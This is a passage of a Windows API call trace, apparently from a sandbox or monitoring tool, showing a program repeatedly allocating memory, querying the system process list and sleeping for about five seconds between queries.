BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.725] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.728] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.732] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.735] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.738] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.739] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.742] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.747] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.756] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.757] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.760] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.767] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.775] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.785] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.786] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.796] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.806] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.817] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.820] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.826] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.835] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.843] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.843] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.851] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.852] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.861] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.862] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.865] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.871] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.880] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.889] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.891] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.892] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.898] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.899] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.900] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.907] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.910] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, 